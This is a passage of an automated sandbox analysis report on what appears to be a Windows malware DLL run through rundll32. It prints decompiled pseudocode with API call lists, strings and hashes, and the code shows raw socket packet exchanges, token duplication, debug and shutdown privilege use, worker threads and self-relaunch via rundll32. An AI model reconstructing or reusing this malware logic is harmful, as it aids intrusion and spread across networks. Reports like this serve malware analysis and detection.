													 *((intOrPtr*)(_t248 + 0x18)) = 1;
													 *_t248 = 0x12;
													 *((intOrPtr*)(_t248 + 4)) = 0;
													 *((intOrPtr*)(_t248 + 0xc)) = 0;
													 *((intOrPtr*)(_t248 + 0x10)) = 0;
													 *((intOrPtr*)(_t248 + 0x14)) = 0;
													 *((intOrPtr*)(_t248 + 0x1c)) = 0x48;
													 *((intOrPtr*)(_t248 + 0x20)) = ( *(_t251 + 0x88) & 0x0000ffff) + ( *(_t251 + 0x59) & 0x000000ff);
													_t218 = 2;
													 *((short*)(_t248 + 0x25)) = _t218;
													if(E007B3209( *(_t251 + 0x59) & 0x000000ff, _a4, _a12,  *_a16 & 0x0000ffff, _t248, _a8, _t218) != 0) {
														L21:
														_v8 = _v8 & 0x00000000;
													}
													L22:
													HeapFree(GetProcessHeap(), 8, _t248);
												}
											}
											L23:
											if(_v8 == 0) {
												Sleep(0x7d0);
												_t249 = HeapAlloc(GetProcessHeap(), 8, 0x29);
												if(_t249 != 0) {
													_t172 = 4;
													 *((intOrPtr*)(_t249 + 4)) = _t172;
													 *((intOrPtr*)(_t249 + 0xc)) = _t172;
													 *((intOrPtr*)(_t249 + 0x14)) = _t172;
													_t173 = 5;
													 *((short*)(_t249 + 0x25)) = _t173;
													_t174 = 7;
													 *(_t249 + 0x27) = _t174;
													 *_t249 = 0x13;
													 *((intOrPtr*)(_t249 + 0x18)) = 0x4c;
													_t233 = _a8;
													 *((short*)(_a8 + 3)) =  *_a16;
													_t245 =  *(_t249 + 0x27) & 0x0000ffff;
													_v24 = ( *(_a12 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff;
													_v8 = E007B32AF(_a4, _a12, ( *(_a12 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff, _t249, _a8,  *(_t249 + 0x27) & 0x0000ffff);
													HeapFree(GetProcessHeap(), 8, _t249);
													_v8 = 0xbadf00d;
													if(_v8 == 0x10002) {
														_t253 = _a16;
														if(E007B3680(_t233, _a4, _a12, _v24,  *_a16 & 0x0000ffff, _v16,  &_v12) != 0 && E007B41E9(_t233, _t245, _a4,  &_a12,  *_t253 & 0x0000ffff,  &_v12) != 0) {
															_v8 = _v8 & 0x00000000;
														}
														_t251 = _v12;
													} else {
														if(((0 | _v16 == 0x00000000) & (0 | 1 ==  *_t251) & (0 | _a20 == 0x00000005)) != 0) {
															 *_t251 = 0;
															goto L28;
														}
													}
												}
											}
											goto L38;
										}
									}
									L41:
								}
							}
						}
					}
					L13:
					HeapFree(GetProcessHeap(), 8, _t251);
				}
				return _v8;
				goto L41;
			}

0x007b46c7
0x007b46dd
0x007b46ed
0x007b46ef
0x007b46f4
0x007b4aa4
0x007b46fa
0x007b46fa
0x007b4702
0x007b4717
0x007b471e
0x007b4731
0x007b4734
0x007b4739
0x007b473f
0x007b4743
0x007b475a
0x007b4761
0x007b4788
0x007b47ae
0x007b47ae
0x007b478a
0x007b478f
0x007b47a6
0x007b47c2
0x00000000
0x007b47a8
0x007b47a8
0x007b47ac
0x007b475e
0x00000000
0x00000000
0x00000000
0x00000000
0x007b47ac
0x007b47a6
0x00000000
0x007b4788
0x007b47cb
0x00000000
0x007b4745
0x007b4756
0x007b47ce
0x007b47d9
0x007b47e7
0x00000000
0x007b47e9
0x007b47f9
0x007b47fb
0x007b4800
0x00000000
0x007b4802
0x007b4806
0x007b4959
0x007b495d
0x007b4966
0x007b496c
0x007b4970
0x007b4976
0x007b497c
0x007b4982
0x007b4988
0x007b498c
0x007b4992
0x007b4998
0x007b499e
0x007b49a2
0x007b49a2
0x007b49a6
0x007b49b2
0x007b49bb
0x007b49bc
0x007b49be
0x007b49cb
0x007b49db
0x007b49df
0x00000000
0x007b49e5
0x007b49e7
0x007b49ec
0x007b49f2
0x007b49f6
0x007b49fa
0x007b4a01
0x007b4a05
0x007b4a06
0x007b4a0a
0x007b4a1a
0x007b4a1e
0x007b4a23
0x007b4a3c
0x00000000
0x007b4a42
0x007b4a49
0x00000000
0x007b4a49
0x007b4a91
0x007b4a99
0x00000000
0x007b4a99
0x00000000
0x007b480c
0x007b4815
0x007b481b
0x007b4820
0x007b4823
0x007b4826
0x007b4829
0x007b482c
0x007b482f
0x007b4832
0x007b4835
0x007b484b
0x007b484e
0x007b4853
0x007b486c
0x007b486e
0x007b486e
0x007b486e
0x007b4872
0x007b4878
0x007b4878
0x007b481b
0x007b487e
0x007b4882
0x007b488d
0x007b48a0
0x007b48a4
0x007b48ac
0x007b48af
0x007b48b2
0x007b48b5
0x007b48b8
0x007b48bb
0x007b48bf
0x007b48c0
0x007b48c7
0x007b48ca
0x007b48eb
0x007b48ee
0x007b48f2
0x007b4900
0x007b490e
0x007b4914
0x007b4921
0x007b4928
0x007b4a52
0x007b4a70
0x007b4a8a
0x007b4a8a
0x007b4a8e
0x007b492e
0x007b494e
0x007b4956
0x00000000
0x007b4956
0x007b494e
0x007b4928
0x007b48a4
0x00000000
0x007b4882
0x007b4800
0x00000000
0x007b47e7
0x007b4756
0x007b4743
0x007b473f
0x007b47b1
0x007b47b7
0x007b47b7
0x007b4ab2
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 007B46E4
HeapAlloc.KERNEL32(00000000), ref: 007B46E7

Part of subcall function 007B2497: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24AF
Part of subcall function 007B2497: HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24B8
Part of subcall function 007B2497: GetProcessHeap.KERNEL32(00000008,00001124,74654F20,?,?,?,007B471C,?,?,?,?,?), ref: 007B24CD
Part of subcall function 007B2497: HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24D0
Part of subcall function 007B2497: rand.MSVCRT ref: 007B24E1
Part of subcall function 007B2497: htons.WS2_32(00001120), ref: 007B24FF
Part of subcall function 007B2497: rand.MSVCRT ref: 007B255F
Part of subcall function 007B2497: GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,007B471C,?,?,?,?,?), ref: 007B2576
Part of subcall function 007B2497: HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B257D
Part of subcall function 007B2497: htons.WS2_32(0000015C), ref: 007B259F
Part of subcall function 007B2497: rand.MSVCRT ref: 007B25CD

Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007B478F
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 007B47B4
HeapFree.KERNEL32(00000000), ref: 007B47B7
GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B47F0
HeapAlloc.KERNEL32(00000000), ref: 007B47F9
GetProcessHeap.KERNEL32(00000008,00000027), ref: 007B4810
HeapAlloc.KERNEL32(00000000), ref: 007B4813
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 007B4875
HeapFree.KERNEL32(00000000), ref: 007B4878
Sleep.KERNEL32(000007D0), ref: 007B488D
GetProcessHeap.KERNEL32(00000008,00000029), ref: 007B4897
HeapAlloc.KERNEL32(00000000), ref: 007B489A
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 007B4911
HeapFree.KERNEL32(00000000), ref: 007B4914
GetProcessHeap.KERNEL32(00000008,00000013), ref: 007B49D2

Part of subcall function 007B2E12: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 007B2E32
Part of subcall function 007B2E12: HeapAlloc.KERNEL32(00000000), ref: 007B2E3B
Part of subcall function 007B2E12: GetProcessHeap.KERNEL32(00000008,00000048,74654F20), ref: 007B2E4D
Part of subcall function 007B2E12: HeapAlloc.KERNEL32(00000000), ref: 007B2E50
Part of subcall function 007B2E12: htons.WS2_32(00000044), ref: 007B2E68
Part of subcall function 007B2E12: send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 007B2EF3
Part of subcall function 007B2E12: recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 007B2F0B
Part of subcall function 007B2E12: GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B2F31
Part of subcall function 007B2E12: HeapFree.KERNEL32(00000000), ref: 007B2F38
Part of subcall function 007B2E12: GetProcessHeap.KERNEL32(00000008,?), ref: 007B2F43

HeapAlloc.KERNEL32(00000000), ref: 007B49D5

Part of subcall function 007B3680: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74654F20,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B3698
Part of subcall function 007B3680: HeapAlloc.KERNEL32(00000000,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B36A1
Part of subcall function 007B3680: GetProcessHeap.KERNEL32(00000008,00000027,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B36B1
Part of subcall function 007B3680: HeapAlloc.KERNEL32(00000000,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B36B4
Part of subcall function 007B3680: GetProcessHeap.KERNEL32(00000008,00000013,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B36C7
Part of subcall function 007B3680: HeapAlloc.KERNEL32(00000000,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B36CA
Part of subcall function 007B3680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B37A2

GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B4A96
HeapFree.KERNEL32(00000000), ref: 007B4A99

Strings

Uet0Xet, xrefs: 007B47B7, 007B4878, 007B4914, 007B4A99

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$Sleephtonsrand$recvsend
String ID: Uet0Xet
API String ID: 3041643382-1689521831
Opcode ID: 44e3cbb8ed28b1d007707cbb9185cc7818daa662d53b781e293c62ed4a1eef59
Instruction ID: 3ec3e6a1c4cd084b6b12bb28805bde4cf198a1ddce6839d8a7c95247245c7302
Opcode Fuzzy Hash: 44e3cbb8ed28b1d007707cbb9185cc7818daa662d53b781e293c62ed4a1eef59
Instruction Fuzzy Hash: C6C1AB7540034AFADB10CFA4C804BEABBB5FF49304F108519F995DB691E738E950DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007B79D7 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 237
threadsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E007B79D7(void* __ebx, void* __ecx, void* __edi, char _a4, signed int _a8, char _a12, int _a16) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				char _v304;
				short _v1652;
				short _v1976;
				short _v3212;
				void* __esi;
				void* _t60;
				intOrPtr _t63;
				void* _t72;
				int _t78;
				char* _t84;
				char* _t85;
				void* _t91;
				char _t108;
				void* _t119;
				long _t120;
				signed char* _t121;
				long _t122;
				signed int _t124;
				signed int _t127;
				intOrPtr _t128;
				void* _t132;
				intOrPtr* _t134;
				void* _t135;

				_t118 = __ecx;
				_push(_t128);
				E007B7897(__ecx, _t128);
				if(_a16 != 0xffffffff) {
					E007B923F(__ecx, _a4, _a8, _a12); // executed
				}
				_t60 = E007B7F04(); // executed
				if(_t60 != 0) {
					ExitProcess(0);
				}
				_t142 =  *0x7c7bc0 & 0x00000002;
				if(( *0x7c7bc0 & 0x00000002) != 0) {
					E007B7E8E(_t118, _t142); // executed
				}
				E007B84EE(); // executed
				E007B10A7(); // executed
				_a8 = 0;
				_v8 = 0;
				_a16 = 0;
				_a4 = 0;
				__imp__#115(0x202, 0x7c81e0); // executed
				_t63 = E007B6C5F(0x24, E007B6AA8, 0, 0xffff); // executed
				 *0x7c7bb8 = _t63;
				 *0x7c7b80 = E007B6C5F(8, E007B67F9, E007B682F, 0xff);
				 *0x7c7b88 = 0;
				InitializeCriticalSection(0x7c7b9c);
				E007B652F(_t118, _a12); // executed
				E007B7DD0(_t118,  &_a8,  &_v8,  &_a16,  &_a4); // executed
				E007B8192(); // executed
				_t72 = CreateEventW(0, 1, 0, 0);
				_v24.dwThreadId = _t72;
				CreateThread(0, 0, E007B8A6F, _t72, 0, 0); // executed
				if(( *0x7c7b7c & 0x00000002) != 0) {
					CreateThread(0, 0, E007B77D1, 0, 0, 0); // executed
					if(( *0x7c7bc0 & 0x00000002) != 0 && ( *0x7c7b7c & 0x00000001) != 0) {
						E007B7146(_t118, _t128); // executed
					}
					E007B6CC8( *0x7c7b80);
					_t146 =  *0x7c7bc0 & 0x00000004;
					if(( *0x7c7bc0 & 0x00000004) != 0) {
						 *0x7c7b88 = E007B6C5F(4, E007B787C, 0, 0xff);
						_push( &_v304);
						_t108 = E007B85FB(_t146);
						if(_t108 != 0) {
							_t134 =  &_v304;
							_a12 = _t108;
							do {
								E007BA3B1(_t118,  *_t134);
								if(E007B796E(_t118,  *_t134) != 0) {
									E007B6E66(_t118,  *0x7c7b88, _t134, 0);
								}
								_t134 = _t134 + 4;
								_t28 =  &_a12;
								 *_t28 = _a12 - 1;
							} while ( *_t28 != 0);
						}
					}
					_t128 =  *0x7c7b88;
					E007B6CC8(_t128);
					CreateThread(0, 0, E007BA1A9, 0, 0, 0); // executed
					E007BA420(_t118, _a16 * 0xea60); // executed
					Sleep(_a8 * 0xea60); // executed
				}
				if(( *0x7c7b7c & 0x00000010) != 0) {
					_t91 = E007B554A(_t118,  &(_v92.dwFlags), 0x21); // executed
					if(_t91 != 0) {
						_t132 = 0;
						do {
							_t121 = _t135 + _t132 - 0x2c;
							_t127 = 0x3e;
							_t124 = ( *_t121 & 0x000000ff) % _t127;
							_t132 = _t132 + 1;
							_t41 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + _t124; // 0x33323130
							 *_t121 =  *_t41;
						} while (_t132 < 0x20);
						_v24.dwProcessId = 0;
						E007B636B( &(_v92.dwFlags), _v24.dwThreadId); // executed
					}
				}
				Sleep((_a4 + _v8) * 0xea60); // executed
				E007B8A23();
				asm("int3");
				_push(_t135);
				_push(_t128);
				_t78 = GetSystemDirectoryW( &_v1976, 0x30c);
				if(_t78 != 0) {
					_t78 = lstrcatW( &_v1652, L"\\rundll32.exe");
					if(_t78 != 0) {
						_t78 = GetModuleFileNameW( *0x7c7b98, 0x7c7bc8, 0x30c);
						if(_t78 != 0) {
							wsprintfW( &_v3212, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1652, PathFindFileNameW(0x7c7bc8), _a8);
							_t119 = 0x10;
							_t84 =  &_v24;
							do {
								 *_t84 = 0;
								_t84 = _t84 + 1;
								_t119 = _t119 - 1;
							} while (_t119 != 0);
							_t122 = 0x44;
							_t120 = _t122;
							_t85 =  &_v92;
							do {
								 *_t85 = 0;
								_t85 = _t85 + 1;
								_t120 = _t120 - 1;
							} while (_t120 != 0);
							_v92.cb = _t122;
							_t78 = CreateProcessW( &_v1652,  &_v3212, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
							ExitProcess(0);
						}
					}
				}
				return _t78;
			}

0x007b79d7
0x007b79e1
0x007b79e3
0x007b79ec
0x007b79f7
0x007b79f7
0x007b79fc
0x007b7a03
0x007b7a07
0x007b7a07
0x007b7a0d
0x007b7a14
0x007b7a16
0x007b7a16
0x007b7a1b
0x007b7a20
0x007b7a31
0x007b7a34
0x007b7a37
0x007b7a3a
0x007b7a3d
0x007b7a50
0x007b7a66
0x007b7a75
0x007b7a7a
0x007b7a80
0x007b7a89
0x007b7a9e
0x007b7aa3
0x007b7aad
0x007b7ac3
0x007b7ac6
0x007b7acf
0x007b7adf
0x007b7ae8
0x007b7af3
0x007b7af3
0x007b7afe
0x007b7b03
0x007b7b0a
0x007b7b1e
0x007b7b29
0x007b7b2a
0x007b7b31
0x007b7b33
0x007b7b39
0x007b7b3c
0x007b7b3e
0x007b7b4c
0x007b7b56
0x007b7b56
0x007b7b5b
0x007b7b5e
0x007b7b5e
0x007b7b5e
0x007b7b3c
0x007b7b31
0x007b7b63
0x007b7b69
0x007b7b78
0x007b7b84
0x007b7b93
0x007b7b93
0x007b7ba0
0x007b7ba8
0x007b7baf
0x007b7bb1
0x007b7bb3
0x007b7bb3
0x007b7bbe
0x007b7bbf
0x007b7bc1
0x007b7bc2
0x007b7bc8
0x007b7bca
0x007b7bd6
0x007b7bd9
0x007b7bd9
0x007b7baf
0x007b7beb
0x007b7bf1
0x007b7bf6
0x007b7bf7
0x007b7c00
0x007b7c0e
0x007b7c16
0x007b7c28
0x007b7c30
0x007b7c43
0x007b7c4b
0x007b7c6b
0x007b7c76
0x007b7c77
0x007b7c7c
0x007b7c7c
0x007b7c7e
0x007b7c7f
0x007b7c7f
0x007b7c84
0x007b7c85
0x007b7c87
0x007b7c8a
0x007b7c8a
0x007b7c8c
0x007b7c8d
0x007b7c8d
0x007b7cb0
0x007b7cb3
0x007b7cba
0x007b7cba
0x007b7c4b
0x007b7c30
0x007b7cc2

APIs

Part of subcall function 007B7897: GetTickCount.KERNEL32 ref: 007B78AF
Part of subcall function 007B7897: srand.MSVCRT ref: 007B78B2
Part of subcall function 007B7897: GetTickCount.KERNEL32 ref: 007B78B9
Part of subcall function 007B7897: GetModuleFileNameW.KERNEL32(007C7BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B7926

ExitProcess.KERNEL32 ref: 007B7A07

Part of subcall function 007B923F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,007B79FC,?,?,?), ref: 007B927B
Part of subcall function 007B923F: memcpy.MSVCRT ref: 007B9294
Part of subcall function 007B923F: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 007B9303
Part of subcall function 007B923F: VirtualFree.KERNEL32(00000000,?,00004000), ref: 007B9323

WSAStartup.WS2_32(00000202,007C81E0), ref: 007B7A3D
InitializeCriticalSection.KERNEL32(007C7B9C,00000008,007B67F9,007B682F,000000FF,00000024,007B6AA8,00000000,0000FFFF), ref: 007B7A80
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 007B7AAD
CreateThread.KERNELBASE(00000000,00000000,007B8A6F,00000000,00000000,00000000), ref: 007B7AC6
CreateThread.KERNELBASE(00000000,00000000,007B77D1,00000000,00000000,00000000), ref: 007B7ADF

Part of subcall function 007B7E8E: PathFileExistsW.KERNELBASE(?,?), ref: 007B7EB1
Part of subcall function 007B7E8E: GetCurrentProcess.KERNEL32(?,?), ref: 007B7EC3

CreateThread.KERNELBASE(00000000,00000000,007BA1A9,00000000,00000000,00000000), ref: 007B7B78

Part of subcall function 007BA420: GetProcessHeap.KERNEL32(00000008,00000004,746543E0,?,00000000,?,?,007B7B89,000000FF), ref: 007BA436
Part of subcall function 007BA420: HeapAlloc.KERNEL32(00000000,?,?,007B7B89,000000FF), ref: 007BA439
Part of subcall function 007BA420: CreateThread.KERNELBASE ref: 007BA454
Part of subcall function 007BA420: GetProcessHeap.KERNEL32(00000000,00000000,?,?,007B7B89,000000FF), ref: 007BA463
Part of subcall function 007BA420: HeapFree.KERNEL32(00000000,?,?,007B7B89,000000FF), ref: 007BA466

Sleep.KERNELBASE(?,000000FF), ref: 007B7B93
Sleep.KERNELBASE(?), ref: 007B7BEB
GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B7C0E
lstrcatW.KERNEL32(?,\rundll32.exe), ref: 007B7C28
GetModuleFileNameW.KERNEL32(007C7BC8,0000030C), ref: 007B7C43
PathFindFileNameW.SHLWAPI(007C7BC8,?), ref: 007B7C51
wsprintfW.USER32 ref: 007B7C6B
CreateProcessW.KERNEL32 ref: 007B7CB3
ExitProcess.KERNEL32 ref: 007B7CBA

Part of subcall function 007B554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 007B5561
Part of subcall function 007B554A: GetLastError.KERNEL32(?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B556B
Part of subcall function 007B554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B5581
Part of subcall function 007B554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B558E

Strings

%ws C:\Windows\%ws,#1 %ws, xrefs: 007B7C65
\rundll32.exe, xrefs: 007B7C1C

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CreateProcess$FileHeapThread$CryptNameVirtual$AllocContextCountExitFreeModulePathSleepTick$AcquireCriticalCurrentDirectoryErrorEventExistsFindInitializeLastProtectRandomReleaseSectionStartupSystemlstrcatmemcpysrandwsprintf
String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
API String ID: 1016975789-3730106045
Opcode ID: adb28c79a7d2a5ebca47666a380f2f28ee1c9177a8e0a999b829e373d2fbbde2
Instruction ID: ab2b6c56d154a7d378b66e8155d6cb6a455ef6f9e191db48922134c81f64b186
Opcode Fuzzy Hash: adb28c79a7d2a5ebca47666a380f2f28ee1c9177a8e0a999b829e373d2fbbde2
Instruction Fuzzy Hash: D481B2B150424DBEDB14AFB4CC89FEA7BACEF45304F048129FA01A6191DA7C9D40CF64

Uniqueness

Uniqueness Score: -1.00%

Function 007BA1A9 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 149
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E007BA1A9() {
				signed int _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				signed int _v16;
				void _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v48;
				signed int _v52;
				signed int _t46;
				void* _t53;
				intOrPtr _t54;
				signed int _t55;
				_Unknown_base(*)()* _t57;
				signed int _t58;
				void* _t63;
				void* _t65;
				signed int _t67;
				struct _SECURITY_ATTRIBUTES* _t75;
				signed int _t78;
				void* _t82;
				struct _SECURITY_ATTRIBUTES* _t84;
				void** _t86;
				void* _t92;

				_v24 =  *0x7c7bb8;
				_t46 =  !( *0x7c7bc0 >> 2) & 0x00000001;
				_v20 = _t46;
				if(_t46 != 0) {
					_push(0); // executed
					E007BA016(); // executed
				}
				_v52 = _v52 & 0x00000000;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t82 = HeapAlloc(GetProcessHeap(), 8, 8);
				if(_t82 == 0) {
					L27:
					return 0;
				} else {
					 *_t82 = _v20;
					_t53 = HeapAlloc(GetProcessHeap(), 8, 0x21);
					 *(_t82 + 4) = _t53;
					_t95 = _t53;
					if(_t53 == 0) {
						goto L27;
					}
					_t54 = E007B6B0E(_v24, _t95, _t53);
					_t75 = 0;
					_v28 = _t54;
					if(_t54 == 0) {
						goto L27;
					}
					_v8 = 0;
					_v16 = 0;
					while(1) {
						_v12 = _t75;
						if(_v8 == 6) {
							goto L10;
						}
						_t65 = CreateThread(_t75, _t75, E007BA112, _t82, _t75, _t75); // executed
						if(_t65 == 0) {
							L26:
							E007B6B46(_v28);
							goto L27;
						}
						 *(_t92 + _v8 * 4 - 0x30) = _t65;
						_t75 = 0;
						L11:
						_t55 = 0;
						while( *((intOrPtr*)(_t92 + _t55 * 4 - 0x30)) != _t75) {
							_v12 =  &(_v12->nLength);
							_t55 = _t55 + 1;
							if(_t55 != 6) {
								continue;
							}
							break;
						}
						_t57 = GetProcAddress(GetModuleHandleA("kernel32"), "WaitForMultipleObjects");
						_t84 = _v12;
						_t58 =  *_t57(_t84,  &_v52, 0, _v16);
						if(_t58 == 0xffffffff) {
							goto L26;
						}
						if(_t58 != 0x102) {
							__eflags = _t58 - _t84 - 1;
							if(_t58 <= _t84 - 1) {
								_t86 = _t92 + _t58 * 4 - 0x30;
								_v8 = _t58;
								CloseHandle( *_t86);
								 *_t86 =  *_t86 & 0x00000000;
								__eflags =  *_t86;
							}
							L23:
							_t82 = HeapAlloc(GetProcessHeap(), 8, 8);
							if(_t82 == 0) {
								goto L26;
							}
							_t63 = HeapAlloc(GetProcessHeap(), 8, 0x21);
							_t77 = _v20;
							 *(_t82 + 4) = _t63;
							 *_t82 = _v20;
							if(_t63 == 0 || E007B6AD0(_t77, _t63) == 0) {
								goto L26;
							} else {
								_t75 = 0;
								__eflags = 0;
								continue;
							}
						}
						_t78 = 6;
						_v8 = _t78;
						_t67 = 0;
						while( *((intOrPtr*)(_t92 + _t67 * 4 - 0x30)) != 0) {
							_t67 = _t67 + 1;
							if(_t67 != _t78) {
								continue;
							}
							goto L23;
						}
						_v8 = _t67;
						goto L23;
						L10:
						_t18 =  &_v16;
						 *_t18 = _v16 | 0xffffffff;
						__eflags =  *_t18;
						goto L11;
					}
				}
			}

0x007ba1b4
0x007ba1c1
0x007ba1c4
0x007ba1c7
0x007ba1c9
0x007ba1cb
0x007ba1cb
0x007ba1d0
0x007ba1e2
0x007ba1e3
0x007ba1e4
0x007ba1e5
0x007ba1ea
0x007ba1f6
0x007ba1fa
0x007ba32a
0x007ba330
0x007ba200
0x007ba207
0x007ba20c
0x007ba20e
0x007ba211
0x007ba213
0x00000000
0x00000000
0x007ba21d
0x007ba222
0x007ba224
0x007ba229
0x00000000
0x00000000
0x007ba22f
0x007ba232
0x007ba245
0x007ba249
0x007ba24c
0x00000000
0x00000000
0x007ba258
0x007ba260
0x007ba322
0x007ba325
0x00000000
0x007ba325
0x007ba269
0x007ba26d
0x007ba275
0x007ba275
0x007ba277
0x007ba27d
0x007ba280
0x007ba284
0x00000000
0x00000000
0x00000000
0x007ba284
0x007ba297
0x007ba2a0
0x007ba2aa
0x007ba2af
0x00000000
0x00000000
0x007ba2b6
0x007ba2d4
0x007ba2d6
0x007ba2d8
0x007ba2de
0x007ba2e1
0x007ba2e7
0x007ba2e7
0x007ba2e7
0x007ba2ea
0x007ba2f3
0x007ba2f7
0x00000000
0x00000000
0x007ba300
0x007ba302
0x007ba305
0x007ba308
0x007ba30c
0x00000000
0x007ba237
0x007ba243
0x007ba243
0x00000000
0x007ba243
0x007ba30c
0x007ba2ba
0x007ba2bb
0x007ba2be
0x007ba2c0
0x007ba2c7
0x007ba2ca
0x00000000
0x00000000
0x00000000
0x007ba2cc
0x007ba2ce
0x00000000
0x007ba271
0x007ba271
0x007ba271
0x007ba271
0x00000000
0x007ba271
0x007ba245

APIs

GetProcessHeap.KERNEL32(00000008,00000008), ref: 007BA1EB
HeapAlloc.KERNEL32(00000000), ref: 007BA1F4
GetProcessHeap.KERNEL32(00000008,00000021), ref: 007BA209
HeapAlloc.KERNEL32(00000000), ref: 007BA20C
CreateThread.KERNELBASE ref: 007BA258
GetModuleHandleA.KERNEL32(kernel32,WaitForMultipleObjects,00000000), ref: 007BA290
GetProcAddress.KERNEL32(00000000), ref: 007BA297
CloseHandle.KERNEL32(00000000), ref: 007BA2E1
GetProcessHeap.KERNEL32(00000008,00000008), ref: 007BA2EE
HeapAlloc.KERNEL32(00000000), ref: 007BA2F1

Part of subcall function 007BA016: GetCurrentThread.KERNEL32 ref: 007BA035
Part of subcall function 007BA016: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,007BA1D0,00000000), ref: 007BA03C
Part of subcall function 007BA016: DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 007BA059
Part of subcall function 007BA016: CloseHandle.KERNEL32(?,007B6AA8,00000000,00000000,00000000,00000024,007B6AA8,00000000,0000FFFF), ref: 007BA0F5
Part of subcall function 007BA016: CloseHandle.KERNEL32(0000FFFF,007B6AA8,00000000,00000000,00000000,00000024,007B6AA8,00000000,0000FFFF), ref: 007BA105

GetProcessHeap.KERNEL32(00000008,00000021), ref: 007BA2FD
HeapAlloc.KERNEL32(00000000), ref: 007BA300

Strings

kernel32, xrefs: 007BA28B
WaitForMultipleObjects, xrefs: 007BA286
Oet Uet0Xet, xrefs: 007BA1D5

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

